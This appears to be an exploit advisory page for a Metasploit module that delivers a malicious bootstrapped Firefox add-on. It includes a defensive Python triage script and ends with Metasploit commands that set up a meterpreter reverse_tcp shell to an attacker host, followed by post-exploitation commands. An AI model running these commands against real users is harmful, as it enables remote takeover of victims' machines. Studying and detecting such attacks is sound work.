Timeline :

Vulnerability found by Jason Avery on 2007-06-27
Metasploit PoC provided on 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be “bootstrapped”. As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.
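For defensive triage, the markers of a bootstrapped add-on described above can be checked statically in a downloaded .xpi file. This is an added example, not code from the original post or from Metasploit. It assumes the legacy XPI layout (install.rdf carrying em:bootstrap, plus bootstrap.js); the function names and the native-file heuristic are illustrative assumptions.

```python
import io
import re
import zipfile

# install.rdf marks a restartless add-on with em:bootstrap, written either as
# an element or as an RDF attribute.
BOOTSTRAP_RE = re.compile(
    rb"<em:bootstrap>\s*true\s*</em:bootstrap>|em:bootstrap\s*=\s*[\"']true[\"']",
    re.IGNORECASE)
# Assumption: bundled native executables are treated as an extra triage signal.
NATIVE_SUFFIXES = (".exe", ".dll", ".scr", ".so", ".dylib")


def inspect_xpi(data: bytes) -> dict:
    """Collect triage facts about an .xpi passed as raw bytes."""
    report = {"valid_zip": False, "bootstrapped": False, "bootstrap_js": False,
              "signature_files": False, "native_files": []}
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return report
    with archive:
        report["valid_zip"] = True
        names = archive.namelist()
        report["bootstrap_js"] = "bootstrap.js" in names
        # Presence only; this does not verify the signature.
        report["signature_files"] = any(
            n.upper().startswith("META-INF/") and n.lower().endswith((".rsa", ".dsa"))
            for n in names)
        report["native_files"] = [n for n in names
                                  if n.lower().endswith(NATIVE_SUFFIXES)]
        if "install.rdf" in names:
            report["bootstrapped"] = bool(
                BOOTSTRAP_RE.search(archive.read("install.rdf")))
    return report


def needs_review(report: dict) -> bool:
    """Flag restartless add-ons that are unsigned or ship native binaries."""
    restartless = report["bootstrapped"] and report["bootstrap_js"]
    return restartless and (not report["signature_files"]
                            or bool(report["native_files"]))


def make_sample_xpi(files: dict) -> bytes:
    """Build a constructed in-memory .xpi from {name: bytes} for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in files.items():
            z.writestr(name, content)
    return buf.getvalue()
```

Feed `inspect_xpi` the bytes of an .xpi captured by a proxy or found in a profile's extensions directory, and send anything for which `needs_review` returns True to manual analysis.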

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo